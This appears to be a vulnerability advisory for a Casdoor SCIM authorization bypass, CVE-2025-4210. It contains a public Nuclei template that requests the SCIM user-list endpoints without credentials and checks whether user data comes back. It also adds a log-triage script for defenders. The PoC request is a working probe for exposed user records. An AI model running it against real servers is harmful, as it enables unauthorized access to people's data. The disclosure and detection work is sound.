CVE-2025-4210: Casdoor - Authorization Bypass

Date: 2026-01-16 | Affected software: Casdoor | PoC: Public

Vulnerability Description

Casdoor versions up to 1.811.0 contain an authorization bypass in the HandleScim function in controllers/scim.go. Remote attackers can manipulate this function to bypass authorization; exploitation requires remote access.

PoC Code [Public]

id: CVE-2025-4210

info:
  name: Casdoor - Authorization Bypass
  author: theamanrawat
  severity: high
  description: |
    Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.
  impact: |
    Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to version 1.812.0.
  reference:
    - https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-4210
    epss-score: 0.00058
    epss-percentile: 0.18529
    cwe-id: CWE-285
  metadata:
    verified: true
    max-requests: 2
    vendor: casdoor
    product: casdoor
  tags: cve.cve2025,casdoor,scim,auth-bypass,disclosure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/scim/v2/Users"
      - "{{BaseURL}}/api/scim/v2/Users"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "schemas"
          - "totalResults"
          - "Resources"
          - "givenName"
        condition: and

      - type: word
        part: header
        words:
          - "application/scim+json"
          - "application/json"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201533016caa649d288611a02cdfbbf4fc4d6f474d3871f5a87ca366a314a7be14022100958c3bc7f7020b141dd3dc0ea097f7729b9b735e13b6a21885d4031649055501:922c64590222798bb761d5b6d8e72950
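
For triage on a deployment that ran a version up to 1.811.0, the following added example (not part of the template above or of Casdoor) scans access logs for successful requests to the SCIM paths the template probes. It assumes a reverse proxy writing combined log format; the sample log lines and the `trusted_ips` allowlist of legitimate provisioning clients are constructed for illustration.

```python
import re
from collections import Counter

# SCIM route prefixes taken from the two paths the template requests.
SCIM_PREFIXES = ("/scim/v2/", "/api/scim/v2/")

# Assumption: combined log format from a reverse proxy in front of Casdoor.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def scim_hits(lines, trusted_ips=frozenset()):
    """Return (ip, method, path, status) for 2xx SCIM requests from sources
    outside the (hypothetical) allowlist of known provisioning clients."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        # Drop the query string, collapse "//" and compare case-insensitively
        # (a conservative choice) so trivial path variations still match.
        path = re.sub(r"/{2,}", "/", m["target"].split("?", 1)[0])
        if not path.lower().startswith(SCIM_PREFIXES):
            continue
        # Access logs do not show whether credentials were sent, so every
        # successful SCIM response to an unlisted source is worth review.
        if m["status"].startswith("2") and m["ip"] not in trusted_ips:
            hits.append((m["ip"], m["method"], path, int(m["status"])))
    return hits

def hits_by_source(hits):
    """Count flagged requests per client IP, most active first."""
    return Counter(ip for ip, *_ in hits).most_common()

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2026:10:01:12 +0000] "GET /scim/v2/Users HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
    '203.0.113.7 - - [16/Jan/2026:10:01:13 +0000] "GET /api/scim/v2/Users?startIndex=1 HTTP/1.1" 404 19 "-" "curl/8.5.0"',
    '198.51.100.20 - - [16/Jan/2026:10:02:00 +0000] "GET /scim/v2/Users HTTP/1.1" 200 5120 "-" "idp-sync"',
    '192.0.2.44 - - [16/Jan/2026:10:03:41 +0000] "GET /static/js/main.js HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [16/Jan/2026:10:04:02 +0000] "POST /scim/v2/Users HTTP/1.1" 401 42 "-" "python-requests/2.31"',
    '203.0.113.7 - - [16/Jan/2026:10:05:30 +0000] "GET //scim/v2/Users?count=100 HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    flagged = scim_hits(SAMPLE_LOG, trusted_ips={"198.51.100.20"})
    for ip, count in hits_by_source(flagged):
        print(f"{ip}: {count} successful SCIM request(s), unlisted source")
```

After upgrading to 1.812.0, the same scan over new logs should show successful SCIM responses only for the allowlisted provisioning clients.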
